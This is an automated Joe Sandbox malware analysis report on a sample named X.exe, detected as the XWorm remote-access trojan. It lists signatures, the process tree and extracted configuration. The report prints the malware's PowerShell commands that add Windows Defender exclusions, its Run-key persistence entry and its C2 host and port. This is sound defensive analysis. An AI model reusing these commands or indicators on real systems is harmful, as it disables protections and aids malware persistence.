Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
X.exe

Overview

General Information

Sample name:X.exe
Analysis ID:1528947
MD5:edf2d391a87307c0d10482da0aa93e6f
SHA1:017acb50488e7a3e17c9e90eed8dec6c100a9792
SHA256:c492044065d21e049097e0cde12f57be6eca492a097d790a9b192a62d70fd07d
Tags:exegithub-com-fruktoozikuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Binary or sample is protected by dotNetProtector
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates multiple autostart registry keys
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • X.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\X.exe" MD5: EDF2D391A87307C0D10482DA0AA93E6F)
    • powershell.exe (PID: 4876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Windows Defender.exe (PID: 2548 cmdline: "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
      • powershell.exe (PID: 2908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2056 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Google Chrome.exe (PID: 6568 cmdline: "C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe" MD5: D30B86E01EF85AA5FCF4292CB295F00F)
      • powershell.exe (PID: 6684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3636 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 3612 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
  • Windows Defender.exe (PID: 6932 cmdline: "C:\Users\user\AppData\Local\Temp\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • Windows Defender.exe (PID: 1180 cmdline: "C:\Users\user\AppData\Local\Temp\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • Google Chrome.exe (PID: 1888 cmdline: "C:\Users\user\AppData\Local\Temp\Google Chrome.exe" MD5: D30B86E01EF85AA5FCF4292CB295F00F)
  • Google Chrome.exe (PID: 1168 cmdline: "C:\Users\user\AppData\Local\Temp\Google Chrome.exe" MD5: D30B86E01EF85AA5FCF4292CB295F00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["22.ip.gl.ply.gg"], "Port": "54699", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Google Chrome.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\Google Chrome.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\Temp\Google Chrome.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xc1f0:$s6: VirtualBox
      • 0xc14e:$s8: Win32_ComputerSystem
      • 0xd62c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xd6c9:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xd7de:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xcf0e:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\Windows Defender.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Local\Temp\Windows Defender.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 1 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xf4c5:$s6: VirtualBox
            • 0xf423:$s8: Win32_ComputerSystem
            • 0x111b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x1124d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x11362:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x1094e:$cnc4: POST / HTTP/1.1
            00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xdcb0:$s6: VirtualBox
              • 0xdc0e:$s8: Win32_ComputerSystem
              • 0xf0ec:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xf189:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xf29e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xe9ce:$cnc4: POST / HTTP/1.1
              0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                Click to see the 4 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                5.0.Windows Defender.exe.170000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  5.0.Windows Defender.exe.170000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    5.0.Windows Defender.exe.170000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xf6c5:$s6: VirtualBox
                    • 0xf623:$s8: Win32_ComputerSystem
                    • 0x113b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x1144d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x11562:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x10b4e:$cnc4: POST / HTTP/1.1
                    13.0.Google Chrome.exe.610000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      13.0.Google Chrome.exe.610000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        Click to see the 6 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: New RUN Key Pointing to Suspicious Folder
                        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\X.exe, ProcessId: 6696, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X.exe", ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 6696, ParentProcessName: X.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', ProcessId: 4876, ProcessName: powershell.exe
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X.exe", ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 6696, ParentProcessName: X.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', ProcessId: 4876, ProcessName: powershell.exe
                        Sigma detected: Suspicious Script Execution From Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X.exe", ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 6696, ParentProcessName: X.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', ProcessId: 4876, ProcessName: powershell.exe
                        Sigma detected: Change PowerShell Policies to an Insecure Level
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X.exe", ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 6696, ParentProcessName: X.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', ProcessId: 4876, ProcessName: powershell.exe
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\X.exe, ProcessId: 6696, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X.exe", ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 6696, ParentProcessName: X.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', ProcessId: 4876, ProcessName: powershell.exe
                        Sigma detected: Use Short Name Path in Command Line
                        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, ParentCommandLine: "C:\Users\user\Desktop\X.exe", ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 6696, ParentProcessName: X.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe" , ProcessId: 2548, ProcessName: Windows Defender.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\X.exe", ParentImage: C:\Users\user\Desktop\X.exe, ParentProcessId: 6696, ParentProcessName: X.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe', ProcessId: 4876, ProcessName: powershell.exe

                        Suricata Signatures

                        No Suricata rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Found malware configuration
                        Source: 0000000C.00000002.1710922848.0000000003161000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["22.ip.gl.ply.gg"], "Port": "54699", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeReversingLabs: Detection: 91%
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeReversingLabs: Detection: 81%
                        Multi AV Scanner detection for submitted file
                        Source: X.exeReversingLabs: Detection: 63%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: X.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 13.0.Google Chrome.exe.610000.0.unpackString decryptor: 22.ip.gl.ply.gg
                        Source: 13.0.Google Chrome.exe.610000.0.unpackString decryptor: 54699
                        Source: 13.0.Google Chrome.exe.610000.0.unpackString decryptor: 1337
                        Source: 13.0.Google Chrome.exe.610000.0.unpackString decryptor: <Xwormmm>
                        Source: 13.0.Google Chrome.exe.610000.0.unpackString decryptor: Video
                        Source: 13.0.Google Chrome.exe.610000.0.unpackString decryptor: USB.exe
                        Source: 13.0.Google Chrome.exe.610000.0.unpackString decryptor: %LocalAppData%
                        Source: 13.0.Google Chrome.exe.610000.0.unpackString decryptor: Google Chrome.exe
                        Source: X.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: 22.ip.gl.ply.gg
                        Yara detected Generic Downloader
                        Source: Yara matchFile source: 5.0.Windows Defender.exe.170000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.0.Google Chrome.exe.610000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.X.exe.140f9ac0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe, type: DROPPED
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: time.windows.com
                        Source: global trafficDNS traffic detected: DNS query: ip-api.com
                        Source: powershell.exe, 0000001A.00000002.2938908056.000001D0F6095000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                        Source: powershell.exe, 00000011.00000002.2232854236.00000190DD0EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                        Source: powershell.exe, 00000011.00000002.2228425709.00000190DD0C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoqx8
                        Source: X.exe, 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, Windows Defender.exe, 00000005.00000000.1475029676.0000000000172000.00000002.00000001.01000000.00000009.sdmp, Google Chrome.exe, 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Windows Defender.exe.0.dr, Google Chrome.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000002.00000002.1453442601.00000253ADBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1639554132.000002D22106F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1756386840.000001D510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2141274912.00000190D484F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2276113890.0000021E474EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000002.00000002.1423076041.000002539DDA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C4A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E376A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000002.00000002.1423076041.000002539DB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C47E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E37481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F59571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000002.00000002.1423076041.000002539DDA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C4A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E376A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 0000001A.00000002.2977692716.000001D0F8241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                        Source: powershell.exe, 00000009.00000002.1815371128.000001D5759FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
